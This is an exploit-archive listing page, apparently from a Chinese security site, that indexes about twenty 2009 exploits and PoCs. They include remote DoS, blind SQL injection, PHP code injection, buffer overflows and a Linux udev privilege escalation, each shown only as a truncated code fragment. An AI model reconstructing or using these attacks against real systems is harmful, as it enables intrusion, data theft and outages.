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热门关键字: shell  88888  art  vitter  linux
Xitami Web Server <= 5.0 Remote Denial of Service Exploit
  日期:2009-04-23 10:41:42 点击:47 评论:0
#!/usr/bin/perl # # Xitami HTTP Server = v5.0 Remote Denial of Service. # # ------------------------------------------------------------------------------ # The vulnerability is caused due to an error with HEAD request and multi-socket # This can be
Zervit Webserver 0.3 Remote Denial Of Service Exploit
  日期:2009-04-22 11:14:07 点击:34 评论:0
import socket import sys print ------------------------------------------------------ print Zervit Webserver 0.3 Remote Denial Of Service print url: http://zervit.sourceforge.net print print author: shinnai print mail: shinnai[at]autistici[dot]org p
Oracle RDBMS TNS Listener PoC (CVE-2009-0991)
  日期:2009-04-22 11:11:59 点击:181 评论:0
# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process # (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll) # Successfully working with Oracle RDBMS Win32 and Oracle RDBM
Dokeos LMS <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit
  日期:2009-04-22 11:09:44 点击:65 评论:0
?php /* ----------------------------------------------------------------------- Dokeos LMS = 1.8.5 (whoisonline.php) Remote PHP Code Injection Exploit ----------------------------------------------------------------------- author...: EgiX mail.....:
Exploits Trend Micro OfficeScan Client DOS
  日期:2009-04-22 11:06:18 点击:108 评论:0
----------------------------------------------officescan.frm-------------------------------------- VERSION 5.00 Begin VB.Form Form1 BorderStyle = 1 'Fixed Single Caption = Officescan poc ClientHeight = 1350 ClientLeft = 45 ClientTop = 435 ClientWidt
Linksys WRT54GC - Administration Password Change exploit
  日期:2009-04-21 12:23:35 点击:54 评论:0
!-- *************** * Gabriel Lima - gabriel@falandodeseguranca.com * www.falandodeseguranca.com *************** (English:) Linksys WRT54GC - Administration Password Change The Router WRT54GC doesn't seem to check authentication from the administrat
eLitius 1.0 Arbitrary Database Backup Exploit
  日期:2009-04-21 12:18:45 点击:32 评论:0
title Powered By eLitius 1.0 Remote Database Backup /title form action= http://esyndicat.org/admin/database-backup.php method=post name=adminForm table class=admintable tbodytr td style=width: 40%; table class=adminform tbody tr th colspan=2Backup My
TotalCalendar 2.4 Remote Password Change Exploit
  日期:2009-04-21 12:17:58 点击:30 评论:0
title Powered by: TotalCalendar 2.4 Remote Password Change /title tr align=left td width=10nbsp;/td td align=centerspan class=boxHeaderCod[3]d By ThE g0bL!N/span/td td width=10 align=right/td /tr /table/span/td /tr /table /td /tr tr td style=padding:
e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit
  日期:2009-04-21 12:16:51 点击:44 评论:0
#!/usr/bin/env perl # # e107 = 0.7.15 extended_user_fields Blind SQL Injection Exploit # # Description # ------------------------------------------------------------------- # e107 contains one flaw that allows an attacker to carry out an SQL # injec
WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit
  日期:2009-04-21 12:15:55 点击:30 评论:0
#!/usr/bin/perl #*********************************************************************************************** #*********************************************************************************************** #** ** #** ** #** [] [] [] [][][][ [] [
Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
  日期:2009-04-21 12:14:33 点击:50 评论:0
#!/bin/bash ###################################################### # Addonics NAS Adapter bts.cgi Post-Auth DoS # Tested against NASU2FW41 Loader 1.17 # Coded by Mike Cyr, aka h00die # mcyr2 at csc dot_____________com # Notes: Any of these BoF crash
CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC
  日期:2009-04-21 12:14:12 点击:18 评论:0
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## # # CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC # # # ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## my $chars= A x 4104; my $f
Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit
  日期:2009-04-21 12:13:29 点击:40 评论:0
#!/usr/bin/perl ###################################################################################### # Pligg v9.9 Blind SQL Injection ##################################### # # vuln: # editlink.php? SQL Injection: # (magic_quotes off) # # This expl
Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC
  日期:2009-04-21 12:12:36 点击:22 评论:0
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ## # # Groovy Media Player Version 1.1.0 (.M3U File) Local Stack Overflow POC # # # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ## my $cha
1by1 1.67 (.m3u File) Local Stack Overflow PoC
  日期:2009-04-21 12:10:13 点击:27 评论:0
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## # # # 1by1 1.67 (.M3U File) Local Stack Overflow POC # # # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## # my $chars= A x 4104; my $file=goldm.m3u; open(my $FILE, $file) or die Cannot op
MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)
  日期:2009-04-21 12:06:31 点击:68 评论:0
BODY onload=go()/BODY !-- MS09-014: MSIE EMBED element race condition memory corruption Code by SkyLined berendjanwever@gmail.com http://skypher.com/SkyLined/Repro/MSIE/EMBED%20memory%20corruption/repro3.html http://skypher.com/index.php/2009/04/19/m
Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit
  日期:2009-04-20 11:42:20 点击:135 评论:0
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique # by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a 'cat /proc/net/netlink'# and set the first arg to this# script to the pid of the netlink socket# (th
ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit
  日期:2009-04-20 11:41:01 点击:42 评论:0
#!/usr/bin/perl #*********************************************************************************************** #*********************************************************************************************** #** ** #** ** #** [] [] [] [][][][ [] []
cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit
  日期:2009-04-20 11:39:38 点击:319 评论:0
#!/usr/bin/python #Written By Michael Brooks #04/17/2009 #Stack Based Buffer Overflow #The vulnerability is in the btFiles::BuildFromMI function #inside the btfiles.cpp file #Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4
XRDP <= 0.4.1 Remote Buffer Overflow PoC (pre-auth)
  日期:2009-04-20 11:32:52 点击:437 评论:0
/* XRDP = 0.4.1 pre-auth remote PoC exploit. (xrdp.sourceforge.net) ******************************************************************************** 01:59:56 root@crateria:~/xrdp # gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc 02:00:29 root@crateria:~/x
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